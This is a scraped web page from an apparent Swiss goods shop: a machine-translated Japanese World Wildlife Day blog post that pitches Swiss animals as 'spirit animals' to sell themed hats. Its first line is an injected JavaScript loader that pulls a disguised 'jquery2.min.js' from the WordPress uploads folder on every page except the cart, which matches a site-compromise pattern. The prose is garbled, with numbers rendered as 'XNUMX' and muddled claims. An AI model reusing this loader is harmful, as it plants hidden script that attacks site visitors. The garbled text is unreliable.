if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

世界野生生物の日–スイスウェイ

世界野生生物の日は、少なくとも年にXNUMX回、野生の動植物の壮大な世界を祝う素晴らしい機会です。 さらに重要なことは、私たち人間には、地域の生態系を破壊から保護する責任があることを思い出させることです。 動物や植物に対するあらゆる脅威は、乱獲、生息地の喪失、自然災害などの警告サインです。

では、今年はどのようにスイスの方法で祝うのでしょうか。

スイスの動植物は、その美しさと価値において非常に豊かで貴重です。 私たちはこの日をこれらの世界の両方からの多くの種に捧げることができました。 しかし、私たちの考えは異なります。 今年は、ユニークなシンボルを表すスイスの動物に敬意を表したいと思います。 スイスだけでなく、世界中のさまざまな文化でも。 

あなたは不思議に思うかもしれません-私たちはどの動物について話しますか? どうやってこのアイデアを思いついたのですか?

その理由は美しいことにあります スイスの動物の帽子 あなたは私たちの店で見つけることができます。 XNUMX種類のバリエーションでデザインされた美しい作品で、今日私たちが捧げることに決めたスイスの動物が登場します。

これらの美しい生き物に会い、世界野生生物の日を祝いましょう!

世界野生生物の日-スイスの道

ブレイブヒグマ

ブレイブヒグマは何を象徴していますか? 私たちがそれについて考えるとき、私たちの頭に浮かぶ最初のXNUMXつのことは、強さと自信です。 何世紀も前に、クマは勇気を必要とする人々にインスピレーションを与え、人々はそれを強力なトーテムとして崇拝しました。 今日、この捕食者はスイス中部とアルプス南部に住んでいます。

ですから、あなたが強力なリーダーシップと積極的なスキルを持っているのであれば、あなたはブレイブヒグマの特徴を持っていると自由に言うことができます。

マウンテンアイベックス

マウンテンアイベックス、またはアルパインアイベックスは、アルプスに生息する野生のヤギの種です。 何世紀にもわたって、人々はそれがユニコーンのような外観のために魔法の力を持っていると考えていました。 その上、アイベックスは優れた登山家なので、ハイキングや登山を楽しむなら、このゴージャスな生き物はあなたの精神動物になる可能性があります。

イヌワシ

イヌワシとして誰と関係がありますか? ワシになるには、視力、知恵、強さ、勇気を提供するため、広角レンズとより広い視点で人生を見る必要があります。

あなたはいつも人生の新しい高みに到達しようと努力していますか? その場合は、このゴージャスな鳥と自由に付き合ってください。

世界野生生物の日-スイスの道

灰色オオカミ

スイスの他に、灰色オオカミは世界のさまざまな地域に存在しています。 また、これらの国のそれぞれで、象徴性は似ています–鋭い知性、本能との深いつながり、そして自由への欲求。 

あなたはこれらの特徴に自分自身を認識していますか?

アルプスの女王

強大で戦闘的なアルプスの女王は、ヴァレー地方の典型的な牛です。 彼らはその闘志のためにスイスで最も有名な品種として知られています。 ですから、このスイスの動物にどのようなタイプの人々が関係しているのかはかなり明らかです。 夏の間、リーダーは、秋に高山の牧草地から王になった「女王」として降りるのであれば、自分自身を主張しなければなりません。

牛は時計製造やチョコレートと同じくらいスイスの伝統の一部です。

マウンテンドッグ

山犬はベルン地方出身の忠実な友人であり勤勉です。 この品種の犬は優れた番犬です。 適切に訓練されていればかなり穏やかですが、彼らは小さな動物を追いかけて大まかに遊びたいと思うかもしれません。

あなたがこれらの種と犬一般のファンなら、これは確かにあなたの新しい精神動物です。

世界野生生物の日-スイスの道

これらのどれがあなたの精霊動物ですか?

あなたたちがこれらの象徴的なカテゴリーのXNUMXつに分類されない可能性はほとんどありません。 あなたはこれらの動物の少なくともXNUMXつに関係している必要があります。 そして、私たちはそれがどれであるかを知りたがっています!

さあ、恥ずかしがらないで! あなたの答えをソーシャルメディアで私たちと共有してください。

みなさん、ハッピーワールド野生生物の日!



ショッピングカート

×
あなたのカートは空です。 店へ出かける
通貨を選択ください。
上へスクロール
を検索
飲食

ビスケット
ヌル
チョコレート
食べ物や飲み物
スイスコーヒー
ベジタリアンフード

ヌル
ヌル
スポーツ
スイスのバックパック
トラベルバッグ

アクセサリー
ゲームとおもちゃ
ペンとクレヨン
BOOKS
エッセンシャルオイル
環境に優しい製品
ホームアクセサリー
キッチンおよび家庭用品
発売中